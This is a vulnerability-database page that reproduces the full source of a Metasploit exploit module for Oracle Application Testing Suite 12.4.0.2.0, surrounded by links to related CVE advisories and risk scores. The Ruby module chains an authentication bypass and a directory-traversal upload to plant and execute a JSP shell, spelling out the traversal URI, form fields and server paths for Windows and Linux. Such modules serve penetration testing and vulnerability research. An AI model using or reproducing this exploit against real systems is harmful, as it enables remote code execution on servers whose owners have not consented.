Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)

🗓️ 25 May 2016 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 51 Views

Oracle ATS Arbitrary File Upload. Bypass authentication, upload JSP shell

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload
13 Apr 201600:00
zdt
Circl		CVE-2016-0491
13 Apr 201600:00
circl
Circl		CVE-2016-0492
13 Apr 201600:00
circl
CNVD		Unspecified Vulnerability in Oracle Enterprise Manager Grid Control Oracle Application Testing Suite Test Manager for Web Apps Component (CNVD-2016-00668)
23 Jan 201600:00
cnvd
CNVD		Unspecified Vulnerability in Oracle Enterprise Manager Grid Control Oracle Application Testing Suite Test Manager for Web Apps Component (CNVD-2016-00669)
23 Jan 201600:00
cnvd
Check Point Advisories		Oracle Application Testing Suite UploadFileAction fileType Directory Traversal (CVE-2016-0491)
21 Mar 201600:00
checkpoint_advisories
Check Point Advisories		Oracle Application Testing Suite Authentication Bypass (CVE-2016-0492)
19 Jun 201600:00
checkpoint_advisories
CVE		CVE-2016-0491
21 Jan 201602:00
cve
CVE		CVE-2016-0492
21 Jan 201602:00
cve
Cvelist		CVE-2016-0491
21 Jan 201602:00
cvelist
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
 
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle ATS Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an authentication bypass and arbitrary file upload
        in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and
        unknown earlier versions, to upload and execute a JSP shell.
      },
      'Author'         => [
        'Zhou Yu', # Proof of concept
        'wvu'      # Metasploit module
      ],
      'References'     => [
        %w{CVE 2016-0492}, # Auth bypass
        %w{CVE 2016-0491}, # File upload
        %w{EDB 39691}      # PoC
      ],
      'DisclosureDate' => 'Jan 20 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => %w{win linux},
      'Arch'           => ARCH_JAVA,
      'Privileged'     => true,
      'Targets'        => [
        ['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'],
        ['OATS <= 12.4.0.2.0 (Linux)',   'Platform' => 'linux']
      ],
      'DefaultTarget'  => 0
    ))
 
    register_options([
      Opt::RPORT(8088)
    ])
  end
 
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/admin/Login.do'
    )
 
    if res && res.body.include?('12.4.0.2.0')
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end
 
  def exploit
    print_status("Uploading JSP shell to #{jsp_path}")
    upload_jsp_shell
    print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}")
    exec_jsp_shell
  end
 
  def upload_jsp_shell
    mime = Rex::MIME::Message.new
    mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"')
    mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"')
    mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed
    mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed
    mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed
    mime.add_part('*', nil, nil, 'form-data; name="fileType"')
    mime.add_part(payload.encoded, 'text/plain', nil,
                  %Q{form-data; name="file1"; filename="#{jsp_filename}"})
    mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"')
    mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
    mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')
 
    register_files_for_cleanup(jsp_path)
 
    send_request_cgi(
      'method' => 'POST',
      'uri'    => '/olt/Login.do/../../olt/UploadFileUpload.do',
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'data'   => mime.to_s
    )
  end
 
  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri'    => "/olt/pages/#{jsp_filename}"
    )
  end
 
  def jsp_directory
    case target['Platform']
    when 'win'
      '..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages'
    when 'linux'
      '../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages'
    end
  end
 
  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end
 
  def jsp_path
    jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename
  end
 
end

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 May 2016 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.91458
oracle application testing suitefile uploadmetasploitwindowslinuxjsp shellauthentication bypasscve 2016-0492cve 2016-0491edb 39691.
51